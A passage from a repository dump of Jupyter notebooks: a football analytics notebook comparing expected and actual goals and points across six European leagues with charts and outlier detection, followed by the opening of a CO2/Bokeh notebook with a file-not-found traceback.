expected! Luck? Quite a good piece of it. PSG was good that year, but Monaco was extraordinary. Again, we cannot claim it's pure luck or pure skill, but a perfect combination of both in right place and time."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Ligue_1')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## Serie A"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Serie_A']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Serie_A'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Serie_A'], name = 'Expecetd PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in Serie A\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In Italian Serie A Juventus is dominating 8 years in a row although cannot show any major success in Champions League. I think by checking this chart and numbers we can understand that Juve doesn't have strong enough competiton inside the country and gets lots of \"lucky\" points, which again derives from multiple factors and we can see that Napoli outperformed Juventus by xPTS twice, but it is a real life and in, for example 2017, Juve was crazy and scored additional 26 goals (or created goals from nowhere), while Napoli missed 3 more than expected (due to error of goalkeeper or maybe excelence of some team in 1 or 2 particular matches). As with the situation in La Liga when Real Madrid became a champion I am sure we can find 1 or 2 games that was key that year.\n\nDetails matter in football. You see, one error here, one woodwork there and you've lost the title."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing to runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Serie_A')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## RFPL"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'RFPL']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'RFPL'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'RFPL'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in RFPL\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"I do not follow Russian Premier League, so just by coldly looking at data we see the same pattern as scoring more than you deserve and also intersting situation with CSKA Moscow from 2015 to 2017. During these years these guys were good, but converted their advantages only once, the others two - if you do not convert, you get punished or your main competitor just converts better. \n\nThere is no justice in football :D. Although, I believe with VAR the numbers will become more stable in next seasons. Because one of the reasons of those additional goals and points are errors of arbiters."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing to runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'RFPL')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Statistical Overview"},{"metadata":{},"cell_type":"markdown","source":"As there are 6 leagues with different teams and stats, I decided to focus on one in the beginning to test different approaches and then replicate the final analysis model on other 5. And as I watch mostly La Liga I will start with this competiton as I know the most about it."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Creating separate DataFrames per each league\nlaliga = df_xg[df_xg['league'] == 'La_liga']\nlaliga.reset_index(inplace=True)\nepl = df_xg[df_xg['league'] == 'EPL']\nepl.reset_index(inplace=True)\nbundesliga = df_xg[df_xg['league'] == 'Bundesliga']\nbundesliga.reset_index(inplace=True)\nseriea = df_xg[df_xg['league'] == 'Serie_A']\nseriea.reset_index(inplace=True)\nligue1 = df_xg[df_xg['league'] == 'Ligue_1']\nligue1.reset_index(inplace=True)\nrfpl = df_xg[df_xg['league'] == 'RFPL']\nrfpl.reset_index(inplace=True)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"laliga.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Using data from describe() method we can get some interesting insights about every league. Below is the function that helps to get those insights. "},{"metadata":{"trusted":true},"cell_type":"code","source":"def print_records_antirecords(df):\n print('Presenting some records and antirecords: \\n')\n for col in df.describe().columns:\n if col not in ['index', 'year', 'position']:\n team_min = df['team'].loc[df[col] == df.describe().loc['min',col]].values[0]\n year_min = df['year'].loc[df[col] == df.describe().loc['min',col]].values[0]\n team_max = df['team'].loc[df[col] == df.describe().loc['max',col]].values[0]\n year_max = df['year'].loc[df[col] == df.describe().loc['max',col]].values[0]\n val_min = df.describe().loc['min',col]\n val_max = df.describe().loc['max',col]\n print('The lowest value of {0} had {1} in {2} and it is equal to {3:.2f}'.format(col.upper(), team_min, year_min, val_min))\n print('The highest value of {0} had {1} in {2} and it is equal to {3:.2f}'.format(col.upper(), team_max, year_max, val_max))\n print('='*100)\n \n# replace laliga with any league you want\nprint_records_antirecords(laliga)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2014], \n y = laliga['xG_diff'][laliga['year'] == 2014],\n name = '2014',\n mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2015], \n y = laliga['xG_diff'][laliga['year'] == 2015],\n name='2015',\n mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2016], \n y = laliga['xG_diff'][laliga['year'] == 2016],\n name='2016',\n mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2017], \n y = laliga['xG_diff'][laliga['year'] == 2017],\n name='2017',\n mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2018], \n y = laliga['xG_diff'][laliga['year'] == 2018],\n name='2018',\n mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n title=\"Comparing xG gap between positions\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"xG difference\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2014], \n y = laliga['xGA_diff'][laliga['year'] == 2014],\n name = '2014',\n mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2015], \n y = laliga['xGA_diff'][laliga['year'] == 2015],\n name='2015',\n mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2016], \n y = laliga['xGA_diff'][laliga['year'] == 2016],\n name='2016',\n mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2017], \n y = laliga['xGA_diff'][laliga['year'] == 2017],\n name='2017',\n mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2018], \n y = laliga['xGA_diff'][laliga['year'] == 2018],\n name='2018',\n mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n title=\"Comparing xGA gap between positions\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"xGA difference\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2014], \n y = laliga['xpts_diff'][laliga['year'] == 2014],\n name = '2014',\n mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2015], \n y = laliga['xpts_diff'][laliga['year'] == 2015],\n name='2015',\n mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2016], \n y = laliga['xpts_diff'][laliga['year'] == 2016],\n name='2016',\n mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2017], \n y = laliga['xpts_diff'][laliga['year'] == 2017],\n name='2017',\n mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2018], \n y = laliga['xpts_diff'][laliga['year'] == 2018],\n name='2018',\n mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n title=\"Comparing xPTS gap between positions\",\n xaxis={'title': 'Position'},\n yaxis={'title': \"xPTS difference\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From the charts above we can clearly see that top teams score more, concede less and get more points than expected. That's why these teams are top teams. And totally opposite situation with outsiders. The teams from the middleplay average. Totally logical, no huge insights here."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Check mean differences\ndef get_diff_means(df): \n dm = df.groupby('year')[['xG_diff', 'xGA_diff', 'xpts_diff']].mean()\n \n return dm\n\nmeans = get_diff_means(laliga)\nmeans","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Check median differences\ndef get_diff_medians(df): \n dm = df.groupby('year')[['xG_diff', 'xGA_diff', 'xpts_diff']].median()\n \n return dm\n\nmedians = get_diff_medians(laliga)\nmedians","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Outliers Detection"},{"metadata":{},"cell_type":"markdown","source":"## Z-Score"},{"metadata":{},"cell_type":"markdown","source":"Z-Score is the number of standard deviations from the mean a data point is. We can use it to find outliers in our dataset by assuming that |z-score| > 3 is an outlier."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Getting outliers for xG using zscore\nfrom scipy.stats import zscore\n# laliga[(np.abs(zscore(laliga[['xG_diff']])) > 2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xG_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# outliers for xGA\n# laliga[(np.abs(zscore(laliga[['xGA_diff']])) > 2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xGA_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Outliers for xPTS\n# laliga[(np.abs(zscore(laliga[['xpts_diff']])) > 2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xpts_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"12 outliers in total detected with zscore. Poor Osasuna in 2016 - almost 30 not deserved goals.\n\nAs we can see from this data being in outlier space top does not yet make you win the season. But if you miss your opportunities or receive goals where you shouldn't and do that toooooo much - you deserve relegation. Losing and being average is much easier than winning."},{"metadata":{},"cell_type":"markdown","source":"## Interquartile Range (IQR)"},{"metadata":{},"cell_type":"markdown","source":"IQR - is the difference between the first quartile and third quartile of a set of data. This is one way to describe the spread of a set of data. \n\nA commonly used rule says that a data point is an outlier if it is more than 1.5 ⋅ IQR above the third quartile or below the first quartile. Said differently, low outliers are below Q1 − 1.5 ⋅ IQR and high outliers are above Q3 + 1.5 ⋅ IQR.\n\nLet's check it out."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Trying different method of outliers detection\ndf_xg.describe()","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# using Interquartile Range Method to identify outliers\n# xG_diff\niqr_xG = (df_xg.describe().loc['75%','xG_diff'] - df_xg.describe().loc['25%','xG_diff']) * 1.5\nupper_xG = df_xg.describe().loc['75%','xG_diff'] + iqr_xG\nlower_xG = df_xg.describe().loc['25%','xG_diff'] - iqr_xG\n\nprint('IQR for xG_diff: {:.2f}'.format(iqr_xG))\nprint('Upper border for xG_diff: {:.2f}'.format(upper_xG))\nprint('Lower border for xG_diff: {:.2f}'.format(lower_xG))\n\noutliers_xG = df_xg[(df_xg['xG_diff'] > upper_xG) | (df_xg['xG_diff'] < lower_xG)]\nprint('='*50)\n\n# xGA_diff\niqr_xGA = (df_xg.describe().loc['75%','xGA_diff'] - df_xg.describe().loc['25%','xGA_diff']) * 1.5\nupper_xGA = df_xg.describe().loc['75%','xGA_diff'] + iqr_xGA\nlower_xGA = df_xg.describe().loc['25%','xGA_diff'] - iqr_xGA\n\nprint('IQR for xGA_diff: {:.2f}'.format(iqr_xGA))\nprint('Upper border for xGA_diff: {:.2f}'.format(upper_xGA))\nprint('Lower border for xGA_diff: {:.2f}'.format(lower_xGA))\n\noutliers_xGA = df_xg[(df_xg['xGA_diff'] > upper_xGA) | (df_xg['xGA_diff'] < lower_xGA)]\nprint('='*50)\n\n# xpts_diff\niqr_xpts = (df_xg.describe().loc['75%','xpts_diff'] - df_xg.describe().loc['25%','xpts_diff']) * 1.5\nupper_xpts = df_xg.describe().loc['75%','xpts_diff'] + iqr_xpts\nlower_xpts = df_xg.describe().loc['25%','xpts_diff'] - iqr_xpts\n\nprint('IQR for xPTS_diff: {:.2f}'.format(iqr_xpts))\nprint('Upper border for xPTS_diff: {:.2f}'.format(upper_xpts))\nprint('Lower border for xPTS_diff: {:.2f}'.format(lower_xpts))\n\noutliers_xpts = df_xg[(df_xg['xpts_diff'] > upper_xpts) | (df_xg['xpts_diff'] < lower_xpts)]\nprint('='*50)\n\noutliers_full = pd.concat([outliers_xG, outliers_xGA, outliers_xpts])\noutliers_full = outliers_full.drop_duplicates()","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Adding ratings bottom to up to find looser in each league (different amount of teams in every league so I can't do just n-20)\nmax_position = df_xg.groupby('league')['position'].max()\ndf_xg['position_reverse'] = np.nan\noutliers_full['position_reverse'] = np.nan\n\nfor i, row in df_xg.iterrows():\n df_xg.at[i, 'position_reverse'] = np.abs(row['position'] - max_position[row['league']])+1\n \nfor i, row in outliers_full.iterrows():\n outliers_full.at[i, 'position_reverse'] = np.abs(row['position'] - max_position[row['league']])+1","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"total_count = df_xg[(df_xg['position'] <= 4) | (df_xg['position_reverse'] <= 3)].count()[0]\noutlier_count = outliers_full[(outliers_full['position'] <= 4) | (outliers_full['position_reverse'] <= 3)].count()[0]\noutlier_prob = outlier_count / total_count\nprint('Probability of outlier in top or bottom of the final table: {:.2%}'.format(outlier_prob))","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"So we can say that it is very probable that every year in one of 6 leagues there will be a team that gets a ticket to Champions League or Europa Legue with the help of luck on top of their great skills or there is a looser that gets to the second division, because they cannot convert their moments."},{"metadata":{"trusted":true},"cell_type":"code","source":"# 1-3 outliers among all leagues in a year\ndata = pd.DataFrame(outliers_full.groupby('league')['year'].count()).reset_index()\ndata = data.rename(index=int, columns={'year': 'outliers'})\nsns.barplot(x='league', y='outliers', data=data)\n# no outliers in Bundesliga","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Our winners and losers with brilliant performance and brilliant underperformance"},{"metadata":{"trusted":true},"cell_type":"code","source":"top_bottom = outliers_full[(outliers_full['position'] <= 4) | (outliers_full['position_reverse'] <= 3)].sort_values(by='league')\ntop_bottom","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Let's get back to our list of teams that suddenly got into top. Was that because of unbeliavable mix of luck and skill?\not = [x for x in outlier_teams if x in top_bottom['team'].drop_duplicates().tolist()]\not\n# The answer is absolutely no. They just played well during 1 season. Sometimes that happen.","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Conclusions"},{"metadata":{},"cell_type":"markdown","source":"Football is a low-scoring game and one goal can change the entire picture of the game and even end results. That's why long term analysis gives you better picture of the situation. \n\nWith the introduction of xG metric (and others that derive from this) now we can really evaluate the performance of the team on a long run and understand the difference between top teams, middle class teams and absolute outsiders. \n\nxG bring new arguments into discussions around football what makes it even more interesting. And at the same time the game doesn't loose this factor of uncertainty and possibility of crazy things happening. Actually now, these crazy things have a chance to be explained.\n\nIn the end we have found that it is almost 100% chance that something weird will happen in one of the leagues. It is just question of time how epic that will be."}],"metadata":{"kernelspec":{"display_name":"Python 3","language":"python","name":"python3"},"language_info":{"name":"python","version":"3.6.4","mimetype":"text/x-python","codemirror_mode":{"name":"ipython","version":3},"pygments_lexer":"ipython3","nbconvert_exporter":"python","file_extension":".py"}},"nbformat":4,"nbformat_minor":1} -------------------------------------------------------------------------------- /co2-bokeh.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 2, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import pandas as pd\n", 10 | "\n", 11 | "from bokeh.io import output_file, show, curdoc\n", 12 | "from bokeh.plotting import figure\n", 13 | "from bokeh.models import HoverTool, ColumnDataSource, CategoricalColorMapper, Slider\n", 14 | "from bokeh.palettes import Spectral6\n", 15 | "from bokeh.layouts import widgetbox, row" 16 | ] 17 | }, 18 | { 19 | "cell_type": "code", 20 | "execution_count": 5, 21 | "metadata": {}, 22 | "outputs": [ 23 | { 24 | "ename": "FileNotFoundError", 25 | "evalue": "File b'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv' does not exist", 26 | "traceback": [ 27 | "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", 28 | "\u001b[1;31mFileNotFoundError\u001b[0m Traceback (most recent call last)", 29 | "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m()\u001b[0m\n\u001b[0;32m 1\u001b[0m \u001b[1;31m# Data cleaning and preparation\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 2\u001b[1;33m \u001b[0mdata\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mread_csv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 3\u001b[0m \u001b[0mdata\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mhead\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 30 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36mparser_f\u001b[1;34m(filepath_or_buffer, sep, delimiter, header, names, index_col, usecols, squeeze, prefix, mangle_dupe_cols, dtype, engine, converters, true_values, false_values, skipinitialspace, skiprows, nrows, na_values, keep_default_na, na_filter, verbose, skip_blank_lines, parse_dates, infer_datetime_format, keep_date_col, date_parser, dayfirst, iterator, chunksize, compression, thousands, decimal, lineterminator, quotechar, quoting, escapechar, comment, encoding, dialect, tupleize_cols, error_bad_lines, warn_bad_lines, skipfooter, skip_footer, doublequote, delim_whitespace, as_recarray, compact_ints, use_unsigned, low_memory, buffer_lines, memory_map, float_precision)\u001b[0m\n\u001b[0;32m 653\u001b[0m skip_blank_lines=skip_blank_lines)\n\u001b[0;32m 654\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 655\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0m_read\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfilepath_or_buffer\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 656\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 657\u001b[0m \u001b[0mparser_f\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__name__\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mname\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 31 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m_read\u001b[1;34m(filepath_or_buffer, kwds)\u001b[0m\n\u001b[0;32m 403\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 404\u001b[0m \u001b[1;31m# Create the parser.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 405\u001b[1;33m \u001b[0mparser\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mTextFileReader\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfilepath_or_buffer\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 406\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 407\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mchunksize\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0miterator\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 32 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m__init__\u001b[1;34m(self, f, engine, **kwds)\u001b[0m\n\u001b[0;32m 762\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0moptions\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'has_index_names'\u001b[0m\u001b[1;33m]\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mkwds\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'has_index_names'\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 763\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 764\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_make_engine\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mengine\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 765\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 766\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0mclose\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 33 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m_make_engine\u001b[1;34m(self, engine)\u001b[0m\n\u001b[0;32m 983\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_make_engine\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mengine\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;34m'c'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 984\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mengine\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;34m'c'\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 985\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mCParserWrapper\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mf\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0moptions\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 986\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 987\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mengine\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;34m'python'\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 34 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m__init__\u001b[1;34m(self, src, **kwds)\u001b[0m\n\u001b[0;32m 1603\u001b[0m \u001b[0mkwds\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'allow_leading_cols'\u001b[0m\u001b[1;33m]\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mindex_col\u001b[0m \u001b[1;32mis\u001b[0m \u001b[1;32mnot\u001b[0m \u001b[1;32mFalse\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1604\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1605\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_reader\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mparsers\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mTextReader\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0msrc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1606\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1607\u001b[0m \u001b[1;31m# XXX\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 35 | "\u001b[1;32mpandas/_libs/parsers.pyx\u001b[0m in \u001b[0;36mpandas._libs.parsers.TextReader.__cinit__ (pandas\\_libs\\parsers.c:4209)\u001b[1;34m()\u001b[0m\n", 36 | "\u001b[1;32mpandas/_libs/parsers.pyx\u001b[0m in \u001b[0;36mpandas._libs.parsers.TextReader._setup_parser_source (pandas\\_libs\\parsers.c:8873)\u001b[1;34m()\u001b[0m\n", 37 | "\u001b[1;31mFileNotFoundError\u001b[0m: File b'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv' does not exist" 38 | ], 39 | "output_type": "error" 40 | } 41 | ], 42 | "source": [ 43 | "# Data cleaning and preparation\n", 44 | "data = pd.read_csv('/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv')\n", 45 | "data.head()" 46 | ] 47 | }, 48 | { 49 | "cell_type": "code", 50 | "execution_count": 4, 51 | "metadata": {}, 52 | "outputs": [ 53 | { 54 | "data": { 55 | "text/html": [ 56 | "
\n", 57 | "\n", 70 | "\n", 71 | " \n", 72 | " \n", 73 | " \n", 74 | " \n", 75 | " \n", 76 | " \n", 77 | " \n", 78 | " \n", 79 | " \n", 80 | " \n", 81 | " \n", 82 | " \n", 83 | " \n", 84 | " \n", 85 | " \n", 86 | " \n", 87 | " \n", 88 | " \n", 89 | " \n", 90 | " \n", 91 | " \n", 92 | " \n", 93 | " \n", 94 | " \n", 95 | " \n", 96 | " \n", 97 | " \n", 98 | " \n", 99 | " \n", 100 | " \n", 101 | " \n", 102 | " \n", 103 | " \n", 104 | " \n", 105 | " \n", 106 | " \n", 107 | " \n", 108 | " \n", 109 | " \n", 110 | " \n", 111 | " \n", 112 | " \n", 113 | " \n", 114 | " \n", 115 | " \n", 116 | " \n", 117 | " \n", 118 | " \n", 119 | " \n", 120 | " \n", 121 | " \n", 122 | " \n", 123 | " \n", 124 | " \n", 125 | " \n", 126 | " \n", 127 | " \n", 128 | " \n", 129 | " \n", 130 | " \n", 131 | " \n", 132 | " \n", 133 | " \n", 134 | " \n", 135 | " \n", 136 | " \n", 137 | " \n", 138 | " \n", 139 | " \n", 140 | " \n", 141 | "
CountryYearfertilitylifepopulationchild_mortalitygdpregion
0Afghanistan19647.67133.63910474903.0339.71182.0South Asia
1Afghanistan19657.67134.15210697983.0334.11182.0South Asia
2Afghanistan19667.67134.66210927724.0328.71168.0South Asia
3Afghanistan19677.67135.17011163656.0323.31173.0South Asia
4Afghanistan19687.67135.67411411022.0318.11187.0South Asia
\n", 142 | "
